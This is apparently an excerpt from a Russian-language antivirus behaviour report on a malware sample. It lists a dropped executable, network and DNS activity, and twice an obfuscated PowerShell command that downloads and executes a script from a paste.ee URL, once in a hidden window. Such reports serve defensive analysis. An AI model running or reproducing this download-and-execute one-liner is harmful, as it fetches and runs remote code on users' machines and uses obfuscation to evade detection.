Техническая информация
- https://rejgroups.com/binorig.exe как %appdata%\evwgjpt.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/I0qfB')
- <SYSTEM32>\windowspowershell\v1.0\powershell.exe
- 'pa##e.ee':80
- 'pa##e.ee':443
- 're###oups.com':443
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- DNS ASK re###oups.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/I0qfB')' (со скрытым окном)